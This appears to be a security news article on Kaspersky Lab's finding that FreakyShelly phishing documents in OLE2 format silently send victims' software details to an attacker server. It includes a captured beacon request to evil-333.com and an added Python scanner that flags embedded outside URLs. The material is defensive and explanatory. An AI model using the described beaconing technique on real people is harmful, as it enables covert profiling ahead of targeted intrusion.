Search for vulnerabilities in the protection of computers based on the OLE2 file format

Kaspersky Lab experts have identified a feature of popular document-creation software that cybercriminals have used to carry out effective targeted attacks. A malicious component that activates when a plain office document is opened automatically sends the attackers, without any user interaction, information about the software installed on the victim's device. Using this data, the criminals determine which malicious program should be used to break into that particular device.

It does not matter on which device the document is opened: the technique works in both the mobile and the desktop versions of the popular text-editing software. Kaspersky Lab has observed this profiling method in use by at least one cybercriminal group, which the company's researchers named FreakyShelly. Kaspersky Lab reported the matter to the software's developer, but the vulnerability has not yet been fully patched.


This is what a malicious document may look like.

Some time ago, while investigating FreakyShelly targeted attacks, Kaspersky Lab experts identified phishing messages carrying documents in the OLE2 format (a technology that lets applications build compound documents containing content from various sources, including the internet). A quick look at the file did not arouse suspicion: it contained a set of useful tips on getting the most out of Google search and hid no known malicious programs or macros. However, when the experts took a closer look at how the document behaves, it turned out that, once opened, it sends out information about the browser used on the device, the version of the operating system, and other software installed on the attacked device. The problem was that this data was sent to an address it should never have been sent to.

GET http://evil-333.com/cccccccccccc/ccccccccc/ccccccccc.php?cccccccccc HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; InfoPath.2; MSOffice 12)
Accept-Encoding: gzip, deflate
Host: evil-333.com
Proxy-Connection: Keep-Alive

Kaspersky Lab's further investigation showed that the attack is possible because of the way technical information about the document's elements is processed and stored inside the file. Every digital document contains metadata describing its style, location and source, where images (if any) should be fetched from, and other parameters. When the document is opened, the office application reads these parameters and uses them as a "map" to build the document. Kaspersky Lab's researchers found that the parameter indicating the location of the images used in the document can be altered by attackers, through careful manipulation of the file, so that the document "reports" to a website owned by the cybercriminal group.
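The defensive counterpart of the mechanism described above is to inspect incoming OLE2 documents for embedded external links before they are opened. The following is an added example, not Kaspersky Lab's tooling: it checks the OLE2 signature and then scans the raw bytes for http(s) URLs in both 8-bit and UTF-16LE encodings, which is a heuristic rather than a full Compound File parser. The allow-list of trusted hosts and the constructed sample document (reusing the evil-333.com domain from the request above) are assumptions for the demonstration.

```python
import re
from urllib.parse import urlparse

# Signature at offset 0 of every OLE2 (Compound File Binary) document.
OLE2_MAGIC = b"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1"

# URLs as they appear inside OLE2 streams: plain 8-bit text, or UTF-16LE
# (one NUL byte after every ASCII character), the encoding Office commonly
# uses for strings such as field codes and link targets.
_ASCII_URL = re.compile(rb"https?://[\x23-\x7e]+")
_UTF16_URL = re.compile(rb"h\x00t\x00t\x00p\x00(?:s\x00)?:\x00/\x00/\x00(?:[\x23-\x7e]\x00)+")


def is_ole2(data: bytes) -> bool:
    """True when the buffer carries the OLE2 compound-file signature."""
    return data[:8] == OLE2_MAGIC


def external_urls(data: bytes) -> list:
    """Every http(s) URL embedded in the raw bytes, in order of discovery."""
    hits = [m.group(0).decode("ascii") for m in _ASCII_URL.finditer(data)]
    hits += [m.group(0).decode("utf-16-le") for m in _UTF16_URL.finditer(data)]
    return list(dict.fromkeys(hits))  # de-duplicate, keep order


def trusted_host(url: str, allow: tuple) -> bool:
    """True when the URL's host is one of the allowed domains or a subdomain."""
    host = (urlparse(url).hostname or "").lower()
    return any(host == d or host.endswith("." + d) for d in allow)


def assess(data: bytes, allow=("microsoft.com",)) -> dict:
    """Flag an OLE2 document whose content points at a host outside the
    allow-list (a placeholder policy for this example; tune it locally)."""
    if not is_ole2(data):
        return {"ole2": False, "urls": [], "suspicious": []}
    urls = external_urls(data)
    return {"ole2": True, "urls": urls,
            "suspicious": [u for u in urls if not trusted_host(u, allow)]}


# Constructed sample: OLE2 header bytes, a benign 8-bit link, and a UTF-16LE
# link to an attacker-controlled host (domain taken from the request above).
SAMPLE_DOC = (OLE2_MAGIC + b"\x00" * 24
              + "Root Entry".encode("utf-16-le") + b"\x00" * 8
              + b"http://microsoft.com/office" + b"\x00" * 8
              + "http://evil-333.com/cccccccc.php?cccc".encode("utf-16-le")
              + b"\x00\x00")

if __name__ == "__main__":
    print(assess(SAMPLE_DOC))
```

A hit in `suspicious` means the document will make an outbound request to that host as soon as it is rendered, which is exactly the profiling beacon described in the article.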

"Although this feature does not allow malware attacks, it is dangerous because it can effectively support malicious activity while requiring almost no interaction on the part of the user, and it can affect many people around the world due to the popularity of the software. So far, this function has been used in only one case. However, because it is really difficult to detect, we expect that in the future more cybercriminal groups may start using this technique," said Alexander Liskin, manager of the heuristic detection group at Kaspersky Lab.

A full study on the new profiling technique is available at http://r.kaspersky.pl/Hsv4q.
